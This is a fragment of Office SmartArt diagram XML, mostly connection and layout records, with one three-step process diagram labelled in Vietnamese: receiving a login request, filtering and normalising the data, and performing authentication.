  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{AA5A6554-0F08-4333-8024-518246C38F24}" type="presOf" srcId="{4B457D02-B5C8-429E-9D8E-CE7BFD9BA9CF}" destId="{76C995A1-BDFB-48AF-81CE-E04E4AA2A263}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{B43CDAAD-B6EE-49E7-906D-AAB6DE6C74E7}" type="presOf" srcId="{0D595F49-8CA3-45D1-9EED-BEE6EB0DCC68}" destId="{92D5E9C4-B9AA-41FD-AE34-B04F22BD7F33}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{FFDC3AA8-5F7E-4D4A-8C09-86D87E40CCA6}" srcId="{7E691471-FB38-4211-AB56-CA70AA026FFD}" destId="{0D595F49-8CA3-45D1-9EED-BEE6EB0DCC68}" srcOrd="0" destOrd="0" parTransId="{04968895-133D-4CDF-A0A6-D7501A77AEF6}" sibTransId="{7DF0042C-5CE7-46AD-A9D9-F3654A9FB634}"/>
    <dgm:cxn modelId="{262BEE08-EAC5-4165-B183-61125C1EA903}" srcId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" destId="{D74142AE-DE70-491B-B667-60B8ACB25D6B}" srcOrd="0" destOrd="0" parTransId="{CF3966DD-5C57-4460-8D7D-892B26BB2964}" sibTransId="{53BBA451-3970-46F2-A120-02267F4D9977}"/>
    <dgm:cxn modelId="{F91B6D70-36C0-4E97-8B06-C2077D71A89D}" srcId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" destId="{CCBABCCF-A9AC-4065-81F5-8929FB7620AB}" srcOrd="1" destOrd="0" parTransId="{51C550F3-DDD3-46B6-8F3C-224CF31D8941}" sibTransId="{87062F02-2784-4C38-A126-D920D32811E8}"/>
    <dgm:cxn modelId="{54622500-DD4F-4F25-BE5E-DDF7BB4F98DC}" type="presOf" srcId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" destId="{729E3707-EDD4-45AF-9872-109CB750C567}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F083573F-EC16-440D-B277-F249B929D328}" type="presOf" srcId="{CCBABCCF-A9AC-4065-81F5-8929FB7620AB}" destId="{BB4D1FAB-0098-4A8E-9648-4B5FC3DE18AC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{B29B2277-5CD2-4C02-8189-128A8A43A568}" type="presOf" srcId="{7E691471-FB38-4211-AB56-CA70AA026FFD}" destId="{CFB79348-0F78-4F07-A887-AD89AFFA0DD8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{04023D8E-F2AB-4E8D-86E3-E31D054FA584}" srcId="{7E691471-FB38-4211-AB56-CA70AA026FFD}" destId="{836FF8CB-531E-400D-80C6-8C0B322F2923}" srcOrd="2" destOrd="0" parTransId="{A6CD448B-C9E1-445F-B788-FE6271282347}" sibTransId="{80E581D0-6CD3-43D2-89CA-10682F6B74B1}"/>
    <dgm:cxn modelId="{445A7BF9-5AA6-499B-9985-445D0828D077}" srcId="{4B457D02-B5C8-429E-9D8E-CE7BFD9BA9CF}" destId="{7E691471-FB38-4211-AB56-CA70AA026FFD}" srcOrd="0" destOrd="0" parTransId="{96EC319A-77B3-4130-8C1F-EF6D3CBCA973}" sibTransId="{9EA87C85-0E04-4687-BCD5-CC51AEFABAFC}"/>
    <dgm:cxn modelId="{E2D2ABEC-EA78-4F0A-AF22-D3220BA1DF13}" type="presOf" srcId="{58667242-F69F-420A-9414-129EBAAD9ED5}" destId="{99B486E3-5B08-4FD5-AC99-1F112361DE81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{2A8B7FA8-5D54-415F-82DC-D6074B1C7CBC}" type="presOf" srcId="{836FF8CB-531E-400D-80C6-8C0B322F2923}" destId="{BE88701F-0306-4D7B-9956-52814B9A671C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{EFAE6FBE-D8B6-415D-9E3C-4EAD28E06ADE}" srcId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" destId="{DFA342DB-3279-4863-BDB6-A2EAAE4B5A91}" srcOrd="3" destOrd="0" parTransId="{E6C07EC4-6DA9-4662-A085-8A06C5D94C76}" sibTransId="{DDFCB7A0-2B60-4DAD-A2A9-0D0614787F7D}"/>
    <dgm:cxn modelId="{655FDE26-0DFD-40AF-B736-495546BEA754}" type="presOf" srcId="{30E0FCF5-7893-403D-8673-201E8DE35596}" destId="{54D07CCB-3F1C-4E99-9A19-DB06B7BE73ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{2110AE6F-BF3F-4950-93B5-DAFC424B58B3}" srcId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" destId="{30E0FCF5-7893-403D-8673-201E8DE35596}" srcOrd="2" destOrd="0" parTransId="{2439CF00-DC99-4D3B-8901-336DC800EC44}" sibTransId="{3E094E33-59B1-4B99-9917-599735FC47C2}"/>
    <dgm:cxn modelId="{CD7A32C2-3B8E-4021-90B2-6A1F4C9F70F9}" srcId="{7E691471-FB38-4211-AB56-CA70AA026FFD}" destId="{58667242-F69F-420A-9414-129EBAAD9ED5}" srcOrd="3" destOrd="0" parTransId="{FDD3AC38-CD79-44D4-9A74-A09F10724CA2}" sibTransId="{4CA0D050-634D-4E59-8F99-CF4EE8782590}"/>
    <dgm:cxn modelId="{3D717E33-1E7D-49C0-A855-EEE6E37B0F1E}" srcId="{7E691471-FB38-4211-AB56-CA70AA026FFD}" destId="{7A829591-EF65-4A3E-A1C9-3AB0D9B069FE}" srcOrd="1" destOrd="0" parTransId="{8E66BE9A-7A9B-4986-AAF8-F2297D59C8F2}" sibTransId="{BA204652-1F6A-49F2-B2CB-15C75859D3D9}"/>
    <dgm:cxn modelId="{53948810-362C-4245-8E02-3D5A4B83971F}" type="presOf" srcId="{D74142AE-DE70-491B-B667-60B8ACB25D6B}" destId="{CD699742-0367-4478-BC0E-18E4FA0D60E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{E60F43FE-81CC-418C-B84F-771688F653BE}" type="presOf" srcId="{7A829591-EF65-4A3E-A1C9-3AB0D9B069FE}" destId="{554ABEAD-EFB0-4ABB-A0A8-16576E38E62F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{99F95341-8962-4B6F-A836-22481F53706A}" type="presOf" srcId="{DFA342DB-3279-4863-BDB6-A2EAAE4B5A91}" destId="{2799E6B7-5AA2-4E44-9BBA-C5BF0C1DABF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{0802915A-EC65-440A-8B28-0B78A2B956D7}" type="presOf" srcId="{7E691471-FB38-4211-AB56-CA70AA026FFD}" destId="{9E64B11B-1FB0-4E4D-887E-82C7C79B24F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{9F73E7DF-A328-45AD-82BC-609079F80C43}" srcId="{4B457D02-B5C8-429E-9D8E-CE7BFD9BA9CF}" destId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" srcOrd="1" destOrd="0" parTransId="{63FAC323-62B9-467A-BF0B-7CC377E03D8B}" sibTransId="{B6375FF7-BB76-4B9A-B3EE-43102E1E85F7}"/>
    <dgm:cxn modelId="{3710DD1E-47CA-46A6-8661-0578EF56454B}" type="presOf" srcId="{7B4B0EA2-D56A-4ECA-BE4E-733D01E71CA7}" destId="{765ED544-51F1-4EE1-AD44-7D6689BCAE1A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{4709BB4E-A10C-4C96-94CA-7529B5437CDF}" type="presParOf" srcId="{76C995A1-BDFB-48AF-81CE-E04E4AA2A263}" destId="{031579B8-B740-46AF-A6D4-53CEA7AFCDFD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{E2B12096-CA4C-4462-986B-1E3A4FB3E866}" type="presParOf" srcId="{031579B8-B740-46AF-A6D4-53CEA7AFCDFD}" destId="{9E64B11B-1FB0-4E4D-887E-82C7C79B24F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{CC516E8B-F3C6-4C5D-AF45-BB7F855DB439}" type="presParOf" srcId="{031579B8-B740-46AF-A6D4-53CEA7AFCDFD}" destId="{CFB79348-0F78-4F07-A887-AD89AFFA0DD8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{EC0A1BA5-B338-4720-A56D-ACC6F1EAAA46}" type="presParOf" srcId="{031579B8-B740-46AF-A6D4-53CEA7AFCDFD}" destId="{AAB8CC09-C1B4-4444-8772-05FF95A1A1D9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{35482934-88A9-4742-8484-40E804281464}" type="presParOf" srcId="{AAB8CC09-C1B4-4444-8772-05FF95A1A1D9}" destId="{71F59326-3571-4133-8570-71855B67B7DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F460DD1B-E86A-4D36-BAA6-22D14F6BB175}" type="presParOf" srcId="{71F59326-3571-4133-8570-71855B67B7DC}" destId="{92D5E9C4-B9AA-41FD-AE34-B04F22BD7F33}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{88EB2EA3-61E4-4611-A19A-41A807216855}" type="presParOf" srcId="{71F59326-3571-4133-8570-71855B67B7DC}" destId="{EF9AE7E4-01C8-45F4-8063-D4BE8CEB7111}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{E6C99779-0EE5-4B24-8DE3-075C92D83A5B}" type="presParOf" srcId="{71F59326-3571-4133-8570-71855B67B7DC}" destId="{554ABEAD-EFB0-4ABB-A0A8-16576E38E62F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{857264D6-F61F-4B70-BD08-7BAC6D7A7E8F}" type="presParOf" srcId="{71F59326-3571-4133-8570-71855B67B7DC}" destId="{22B0D8C3-1105-4410-81C1-351373A259D6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{2811F9ED-6197-47B0-8035-78013CE3593A}" type="presParOf" srcId="{71F59326-3571-4133-8570-71855B67B7DC}" destId="{BE88701F-0306-4D7B-9956-52814B9A671C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D8028D36-E507-40E1-A14E-61FD2F789FC8}" type="presParOf" srcId="{71F59326-3571-4133-8570-71855B67B7DC}" destId="{7CD998A8-DB8A-412D-B1C4-E06E6E3B778C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F9BE88BD-9A74-4D50-A022-FF999DF417C8}" type="presParOf" srcId="{71F59326-3571-4133-8570-71855B67B7DC}" destId="{99B486E3-5B08-4FD5-AC99-1F112361DE81}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{1CBD9857-ED93-42D6-A365-464B65406174}" type="presParOf" srcId="{76C995A1-BDFB-48AF-81CE-E04E4AA2A263}" destId="{9252B015-C369-463F-8B79-870B1BE09429}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{0C987EC6-FFF0-4052-B949-5CA74B2CB1F1}" type="presParOf" srcId="{76C995A1-BDFB-48AF-81CE-E04E4AA2A263}" destId="{BA8D73A1-52AC-40E3-8091-4690C16FCC83}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{CB64820C-1E5B-4501-942E-D92F1E8AEB88}" type="presParOf" srcId="{BA8D73A1-52AC-40E3-8091-4690C16FCC83}" destId="{729E3707-EDD4-45AF-9872-109CB750C567}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{E09F6453-3C86-48D7-BFF5-A2C202AB1523}" type="presParOf" srcId="{BA8D73A1-52AC-40E3-8091-4690C16FCC83}" destId="{765ED544-51F1-4EE1-AD44-7D6689BCAE1A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{77C242B6-C7E7-4EDC-A89A-99E8CC45B7E1}" type="presParOf" srcId="{BA8D73A1-52AC-40E3-8091-4690C16FCC83}" destId="{D3B4CBB4-89C2-4895-81DB-E33BC5A0B963}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{AABF6A4E-D6C2-413D-87EE-E9897908DCA7}" type="presParOf" srcId="{D3B4CBB4-89C2-4895-81DB-E33BC5A0B963}" destId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{14B206EC-ED09-4E6E-B51B-A09FA371EED0}" type="presParOf" srcId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" destId="{CD699742-0367-4478-BC0E-18E4FA0D60E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D948BEAA-B2AD-4387-A6C0-24776360B573}" type="presParOf" srcId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" destId="{69A6E080-680C-4FB6-9BDF-60CA15BD119A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{E8D63457-FAE2-48AE-88F5-FA3564EAFDEE}" type="presParOf" srcId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" destId="{BB4D1FAB-0098-4A8E-9648-4B5FC3DE18AC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F786F0F8-053F-4E40-8AAF-CAAA348CB700}" type="presParOf" srcId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" destId="{6A4D6E49-B4BF-4082-A40B-DBB4BE24843D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{4244CAB9-C9FF-47E9-A815-1D68DF528946}" type="presParOf" srcId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" destId="{54D07CCB-3F1C-4E99-9A19-DB06B7BE73ED}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{AD3CBF00-718C-4FEA-B744-BF93FF38AE41}" type="presParOf" srcId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" destId="{9E59AC3F-8CA5-4404-AF86-237AF99706E2}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A956F2FD-4CAB-4BA8-AE13-31234FD8121B}" type="presParOf" srcId="{1EF59823-D39C-4143-8ADF-D27F1D088D32}" destId="{2799E6B7-5AA2-4E44-9BBA-C5BF0C1DABF2}"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8E42874-78CF-4D6F-A1D8-5827120CA772}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{929BAA3B-90D5-4FF0-8745-A262B9487705}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Nhận yêu cầu đăng nhập</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0A8F154-D06C-4700-A3E0-6B8D6E21E39D}" type="parTrans" cxnId="{414959FE-4CF2-42C4-B46B-C974471F3708}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60D993AE-27BF-4828-8460-A4006D030778}" type="sibTrans" cxnId="{414959FE-4CF2-42C4-B46B-C974471F3708}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E2EB6A8-C9AA-4731-BEA9-1816E4957AFF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Lọc, chuẩn hóa dữ liệu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49E0EACA-A28E-4D3E-B2D6-F4938B055203}" type="parTrans" cxnId="{9F143204-BA82-4824-9D11-5004D4DE51F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{264B5E05-AB36-4E82-94FB-FDE396C2AB18}" type="sibTrans" cxnId="{9F143204-BA82-4824-9D11-5004D4DE51F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F23E774D-B2A0-4B5F-AF5D-E753CE891B6B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Tiến hành xác thực</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBAED1CA-D02D-4B8C-940B-6895D9372F95}" type="parTrans" cxnId="{E980DAD5-A528-48F2-A00F-80D9410B4C11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4C57BDD-3863-4312-A14A-4141DBC3CC29}" type="sibTrans" cxnId="{E980DAD5-A528-48F2-A00F-80D9410B4C11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E4E4B14-6A67-4C6A-83AD-83F78CB83996}" type="pres">
      <dgm:prSet presAssocID="{88E42874-78CF-4D6F-A1D8-5827120CA772}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5883E3EF-9769-4AD5-AD32-2E9E75AE389C}" type="pres">
      <dgm:prSet presAssocID="{929BAA3B-90D5-4FF0-8745-A262B9487705}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8E1696F-DA30-4AF2-A103-D9B144089188}" type="pres">
      <dgm:prSet presAssocID="{60D993AE-27BF-4828-8460-A4006D030778}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E97A67C-6CCF-4A7B-B638-3D9910A553CE}" type="pres">
      <dgm:prSet presAssocID="{60D993AE-27BF-4828-8460-A4006D030778}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{931513B7-AEC5-48E8-8006-E0D4E3D0E82C}" type="pres">
      <dgm:prSet presAssocID="{4E2EB6A8-C9AA-4731-BEA9-1816E4957AFF}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCE1AAD5-8C4B-444E-85B5-41B6CB87E9E4}" type="pres">
      <dgm:prSet presAssocID="{264B5E05-AB36-4E82-94FB-FDE396C2AB18}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1A1A6BE-6B38-458E-81A3-5F7788B8D584}" type="pres">
      <dgm:prSet presAssocID="{264B5E05-AB36-4E82-94FB-FDE396C2AB18}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00A3DA5D-6E62-4F9D-86FB-D61BDC327B9B}" type="pres">
      <dgm:prSet presAssocID="{F23E774D-B2A0-4B5F-AF5D-E753CE891B6B}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{9F143204-BA82-4824-9D11-5004D4DE51F2}" srcId="{88E42874-78CF-4D6F-A1D8-5827120CA772}" destId="{4E2EB6A8-C9AA-4731-BEA9-1816E4957AFF}" srcOrd="1" destOrd="0" parTransId="{49E0EACA-A28E-4D3E-B2D6-F4938B055203}" sibTransId="{264B5E05-AB36-4E82-94FB-FDE396C2AB18}"/>
    <dgm:cxn modelId="{4CB0A820-D0F7-4316-96FE-0A58D6EE275C}" type="presOf" srcId="{F23E774D-B2A0-4B5F-AF5D-E753CE891B6B}" destId="{00A3DA5D-6E62-4F9D-86FB-D61BDC327B9B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DE83B39D-43DD-4340-88ED-0D1DCC314876}" type="presOf" srcId="{264B5E05-AB36-4E82-94FB-FDE396C2AB18}" destId="{DCE1AAD5-8C4B-444E-85B5-41B6CB87E9E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{97E73465-58CA-4DA7-B6F6-9F8B80F449B3}" type="presOf" srcId="{4E2EB6A8-C9AA-4731-BEA9-1816E4957AFF}" destId="{931513B7-AEC5-48E8-8006-E0D4E3D0E82C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{73B36E8A-30DE-44DA-BB69-083F94F88D12}" type="presOf" srcId="{264B5E05-AB36-4E82-94FB-FDE396C2AB18}" destId="{E1A1A6BE-6B38-458E-81A3-5F7788B8D584}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E980DAD5-A528-48F2-A00F-80D9410B4C11}" srcId="{88E42874-78CF-4D6F-A1D8-5827120CA772}" destId="{F23E774D-B2A0-4B5F-AF5D-E753CE891B6B}" srcOrd="2" destOrd="0" parTransId="{DBAED1CA-D02D-4B8C-940B-6895D9372F95}" sibTransId="{F4C57BDD-3863-4312-A14A-4141DBC3CC29}"/>
    <dgm:cxn modelId="{C9222B9E-21E8-4BD6-AF2F-DB16439F0A9C}" type="presOf" srcId="{929BAA3B-90D5-4FF0-8745-A262B9487705}" destId="{5883E3EF-9769-4AD5-AD32-2E9E75AE389C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{414959FE-4CF2-42C4-B46B-C974471F3708}" srcId="{88E42874-78CF-4D6F-A1D8-5827120CA772}" destId="{929BAA3B-90D5-4FF0-8745-A262B9487705}" srcOrd="0" destOrd="0" parTransId="{F0A8F154-D06C-4700-A3E0-6B8D6E21E39D}" sibTransId="{60D993AE-27BF-4828-8460-A4006D030778}"/>
    <dgm:cxn modelId="{AB8B8092-2351-454E-BC57-B0F3A6BE6F08}" type="presOf" srcId="{88E42874-78CF-4D6F-A1D8-5827120CA772}" destId="{1E4E4B14-6A67-4C6A-83AD-83F78CB83996}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{EF5A1729-3BED-4DF1-85BD-1AB0F7F8B676}" type="presOf" srcId="{60D993AE-27BF-4828-8460-A4006D030778}" destId="{D8E1696F-DA30-4AF2-A103-D9B144089188}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B5E979F0-1C0C-4772-BFA8-D4A0779AFE1A}" type="presOf" srcId="{60D993AE-27BF-4828-8460-A4006D030778}" destId="{0E97A67C-6CCF-4A7B-B638-3D9910A553CE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{36D5A307-BF55-4441-AE24-F968D8BD148B}" type="presParOf" srcId="{1E4E4B14-6A67-4C6A-83AD-83F78CB83996}" destId="{5883E3EF-9769-4AD5-AD32-2E9E75AE389C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{561FBDA1-F521-4CB2-81F1-6E6916036B4A}" type="presParOf" srcId="{1E4E4B14-6A67-4C6A-83AD-83F78CB83996}" destId="{D8E1696F-DA30-4AF2-A103-D9B144089188}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3C3586CE-33F6-48FB-9B85-79F60AADF865}" type="presParOf" srcId="{D8E1696F-DA30-4AF2-A103-D9B144089188}" destId="{0E97A67C-6CCF-4A7B-B638-3D9910A553CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
